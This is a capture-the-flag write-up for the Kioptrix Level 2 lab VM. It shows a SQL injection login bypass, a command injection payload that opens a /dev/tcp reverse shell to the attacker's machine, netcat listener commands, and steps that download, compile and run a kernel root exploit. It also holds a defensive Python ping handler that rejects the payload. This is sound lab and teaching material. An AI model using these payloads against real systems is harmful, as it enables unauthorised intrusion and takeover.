Kioptrix: Level 2

This is my writeup for the Kioptrix Level 2 VM from vulnhub.com. It's considered easy. The object of the game is to acquire root access via any means possible. There is more than one way to successfully complete the challenges.

Intelligence Gathering

nmap

We now have a list of ports. When we access the IP of the VM on port 80, we see a login form which can be bypassed by entering:

username: admin' '1'or'1

We then find a console asking us to enter an IP to ping. It kinda begs for malicious input.

$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Searchsploit returns https://www.exploit-db.com/exploits/9542/.

Exploitation

Reverse shell

Start a netcat listener on Kali:

$ nc -nvlp 42

Try to connect back:

1;0<&196;exec 196<>/dev/tcp/192.168.254.161/42; sh <&196 >&196 2>&196
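
From the defender's side, the payload above works because the ping console hands its input to a shell unparsed. The following is an added example (not part of the original writeup, and not the VM's own code) of a handler that accepts only an IPv4 literal and runs ping without a shell; the function names and the ping arguments are assumptions.

```python
import ipaddress
import subprocess

# The string the writeup enters into the ping console, kept here as a negative test case.
PAGE_PAYLOAD = "1;0<&196;exec 196<>/dev/tcp/192.168.254.161/42; sh <&196 >&196 2>&196"


def safe_ping_argv(user_input):
    """Return an argv list for ping, or raise ValueError unless the input is an IPv4 literal."""
    candidate = user_input.strip()
    try:
        addr = ipaddress.IPv4Address(candidate)
    except ValueError:
        # AddressValueError is a ValueError subclass; re-raise with a uniform message.
        raise ValueError("not an IPv4 address: %r" % candidate) from None
    # str(addr) is rebuilt by the parser, so no raw user bytes reach the command.
    return ["ping", "-c", "3", str(addr)]


def run_ping(user_input):
    """Hypothetical handler body: validate first, then execute with no shell involved."""
    argv = safe_ping_argv(user_input)
    # An argv list with shell=False means ';', '<', '>' and '&' are never interpreted.
    done = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=15)
    return done.stdout


def classify(inputs):
    """Map each input to 'accepted' or 'rejected' without executing anything."""
    result = {}
    for value in inputs:
        try:
            safe_ping_argv(value)
            result[value] = "accepted"
        except ValueError:
            result[value] = "rejected"
    return result


if __name__ == "__main__":
    # Constructed sample inputs: one valid address, the page's payload, an option-like value.
    for value, verdict in classify(["192.168.254.161", PAGE_PAYLOAD, "-f 10.0.0.1"]).items():
        print("%-10s %r" % (verdict, value))
```

Validation alone or shell-free execution alone would each stop this input; using both keeps the handler safe if one of them is later weakened.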

Kernel

Since we now have a reverse shell, we can run the exploit mentioned above.

$ curl -k https://www.exploit-db.com/download/9542/ > exploit.c
$ gcc -o exploit exploit.c
$ chmod +x exploit
$ ./exploit
